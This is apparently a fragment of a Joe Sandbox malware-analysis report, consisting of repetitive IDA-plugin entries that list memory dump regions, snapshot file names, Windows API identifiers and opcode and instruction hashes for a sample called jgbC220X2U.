                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f23c27e826dc16d363355ab053f223aa956836335dc77cce615b891eaa197be
                • Instruction ID: 77af556193a00c6b56033b636cbb5f34c5096480c9896e43c035a2631b8118bc
                • Opcode Fuzzy Hash: 6f23c27e826dc16d363355ab053f223aa956836335dc77cce615b891eaa197be
                • Instruction Fuzzy Hash: 7F212A66F16B1588EB40EFA2E8804ED67B4E709BD8B445435EE0E23B59EE38C1908750
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bc105ae113dd9ebb499f686b240ce9824b11e2f882d402469c41a583a7d9a9c8
                • Instruction ID: 8b46a154fb366ca308b0d219d102bb2e755da800f609ab380a2d591ea2bfec59
                • Opcode Fuzzy Hash: bc105ae113dd9ebb499f686b240ce9824b11e2f882d402469c41a583a7d9a9c8
                • Instruction Fuzzy Hash: 39210C66F16B1588EF40EFA6EC814ED67B4F749BC8B445435EE4E13B59EE38C1908350
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 05918fc1248b975d222956436176492df8597f2819da265dd20cf9e6c7264bd4
                • Instruction ID: 0b2db118171d0940001a427ee37e83ac43d625b972e09d9595f39732576d7117
                • Opcode Fuzzy Hash: 05918fc1248b975d222956436176492df8597f2819da265dd20cf9e6c7264bd4
                • Instruction Fuzzy Hash: 05212C66B16B1588EB40EFA6E8814ED67B4F749BD8B845435EE4E13B59EE38C1808350
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
                • Instruction ID: 66746a82398c98650d1206136a23cc0491b9d7f72855f8fb2c5fa1fc362bfc52
                • Opcode Fuzzy Hash: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
                • Instruction Fuzzy Hash: E8210966F16B5588EF40EFA6EC814EDA7B4F709BD8B445435EE0E13B19EE38C1908750
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c49cc4cb5fd20c2c8b77cd12d1b038e3538d8f595d0dabc0cf13c35b97362ca
                • Instruction ID: 14f733c2d949bd392f037b04f6bdea9fd88cdf3547edccaaebade31e405e1573
                • Opcode Fuzzy Hash: 1c49cc4cb5fd20c2c8b77cd12d1b038e3538d8f595d0dabc0cf13c35b97362ca
                • Instruction Fuzzy Hash: DA212A66B16B5688EF40EFA2E8804ED67B4EB49BC8B445435EE0E13B59EE38C1908750
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
                • Instruction ID: 8fb2ab7986ea41f127be9cce419d1378ecc68a08caec17fad0657d064e1fdb53
                • Opcode Fuzzy Hash: f7f2e635aaada3017a6d0709ead94ddf1e088a19a1adf4e3ac0af32226e1d976
                • Instruction Fuzzy Hash: 9E21FA66F16B5588EF40EFA6EC414EDA7B4E709BD8B445435EE0E13B19EE38C1908750
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3db5646e96f1ff8c9395c0a62e54e5e86c7c898554bd0464582fce04f0f76811
                • Instruction ID: fa01a55a27a0bf4886c128498c74e977f0043578f996a5079998cb35e3cf09b0
                • Opcode Fuzzy Hash: 3db5646e96f1ff8c9395c0a62e54e5e86c7c898554bd0464582fce04f0f76811
                • Instruction Fuzzy Hash: 1E213C66B16B5688EF40EFA6EC804ED67B4F749BC8B445435EE4E13B19EE38C1818350
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0712976e225e5b2f4763be9ef19959d40821d9cc80544662f083ba19d4e2989
                • Instruction ID: 7cbe846e5f74c00c638e0ec5756754b6e5c8774da5ce29b04384c7a9f2db034a
                • Opcode Fuzzy Hash: c0712976e225e5b2f4763be9ef19959d40821d9cc80544662f083ba19d4e2989
                • Instruction Fuzzy Hash: D621FA76F16B1588EF50EFA6E8414ED67B4EB09BC8B845535FE0E13B19EE38D1808350
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 23499e2016412574379fd2e1b7d4f8318b64be535c81721d378c36e298e0409c
                • Instruction ID: 0180f4764b1bba35c79c84b0d082974de64fb01970aa0bc54b13b64a941af6e9
                • Opcode Fuzzy Hash: 23499e2016412574379fd2e1b7d4f8318b64be535c81721d378c36e298e0409c
                • Instruction Fuzzy Hash: 24213676A01B8584EB24AF26E8943AD7360FB48FD4F489422DF4D07315DF38D494C360
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 8ce3e757da67c655af5b8f6d8655d3e196656a833d96982b34aa08c9a1ab21a2
                • Instruction ID: 64842a39aee46a9c0ce4b4b7c0b3e3dfe361307a31c0ad9eec9c8931d73864bc
                • Opcode Fuzzy Hash: 8ce3e757da67c655af5b8f6d8655d3e196656a833d96982b34aa08c9a1ab21a2
                • Instruction Fuzzy Hash: B121A162B0864680EB24AF25E8443BDE361FF49F88F589071DF0D0B395DE3DE4868760
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: f429d248f7e3d3087664ac9d900b69488d87f779774625c76a44f58e7d66e27b
                • Instruction ID: 9eb1e259247fa3802588a11d07593ad9a6025e43eca99754ce1ac243737a8323
                • Opcode Fuzzy Hash: f429d248f7e3d3087664ac9d900b69488d87f779774625c76a44f58e7d66e27b
                • Instruction Fuzzy Hash: E621A076A16B5989EB10DFA6E8800EC37B4FB49BCCB801126EE4E53B19EF38C150C750
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 1724884cba89ca097dce37717a06f994ecdd22df31c92a7a14a54c841d5b1acb
                • Instruction ID: 362b54115aae370c26e73160ec958c24f641b37ccb1650bef00f4c6fb658a224
                • Opcode Fuzzy Hash: 1724884cba89ca097dce37717a06f994ecdd22df31c92a7a14a54c841d5b1acb
                • Instruction Fuzzy Hash: 39F0AF15E9D11305FEA8BF621D265BDC262EF46B84FC428B0D80E17783EC1DB2015A74
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: f75af1925c0ce7a60d5dd29e2b6d13451473ab83a1d6537ce2b3a364efd057dd
                • Instruction ID: 26b41ba98a219e8b67a7463d3dc80a543841045b53f91e081ebff5122c2d2dd6
                • Opcode Fuzzy Hash: f75af1925c0ce7a60d5dd29e2b6d13451473ab83a1d6537ce2b3a364efd057dd
                • Instruction Fuzzy Hash: E0115B21B1864395FB74BF12AD501B9E376FF59B80FC410B2D94E077A2EE2CE6058B64
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8c8e364cc8adddad7bd3164d0080b3fb32528a4c20ea47283582ac767ae30f0c
                • Instruction ID: aa3c1130be730d7c8114877f11ff9e6c56fa8676f8ea95898941c5a860ae1feb
                • Opcode Fuzzy Hash: 8c8e364cc8adddad7bd3164d0080b3fb32528a4c20ea47283582ac767ae30f0c
                • Instruction Fuzzy Hash: 3C115076F01F158DEB00DFA5E8810AD77B8F709B98B601929DE5D63B19EF34C1618394
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6755e1622f3d3c4fa8f21a4e0fe1c3ea9f388b16dd995effa5171ebaab262e8f
                • Instruction ID: 5172094441de8d06124f64fd95a8d69a39d9b77d421d2b2b4a90ae50cfeb3956
                • Opcode Fuzzy Hash: 6755e1622f3d3c4fa8f21a4e0fe1c3ea9f388b16dd995effa5171ebaab262e8f
                • Instruction Fuzzy Hash: 2E115076F01F158DEB00DFA5E8810AD77B8F709B98B601929DE5C63B19EF34C1618394
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 3f8f3c7c3e6270d6bc436fa0b11d008494d132dd46ed711f24fabb14169a842a
                • Instruction ID: 8b8ee92a13a908c7bf7b403a2b814da9820eefc9289af134227a80a8540ce9c5
                • Opcode Fuzzy Hash: 3f8f3c7c3e6270d6bc436fa0b11d008494d132dd46ed711f24fabb14169a842a
                • Instruction Fuzzy Hash: 7A019202F147C240FB21DB7599017ACA260EF99BC8F44D231DE4C27756EF6891C28320
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 88a5ef570a513221deeda556a9c764416f2fdc6ec8df00f098b2e1ea7024f63c
                • Instruction ID: 735d9ce41b119880dfea9c2f83091a7849e72bf52b25cfcb53199ebb4f3d8d16
                • Opcode Fuzzy Hash: 88a5ef570a513221deeda556a9c764416f2fdc6ec8df00f098b2e1ea7024f63c
                • Instruction Fuzzy Hash: 6BE05015E8D11711FA687F611D225BDC261DF46B84FC428B0D90E17687ED1DB2016965
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 93b83f746264c1e8227f536a1122f88aaa7150999b4695e6dcae3133fe119d8f
                • Instruction ID: 6e91b9e12603957d9e4dc4f605d2d73bde196cf196ceb24467095490cdac59f1
                • Opcode Fuzzy Hash: 93b83f746264c1e8227f536a1122f88aaa7150999b4695e6dcae3133fe119d8f
                • Instruction Fuzzy Hash: 67F09612F4914694FF30BB11E8443B9E760EF49B88F486470DE0D1B396DD3DE4828B54
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
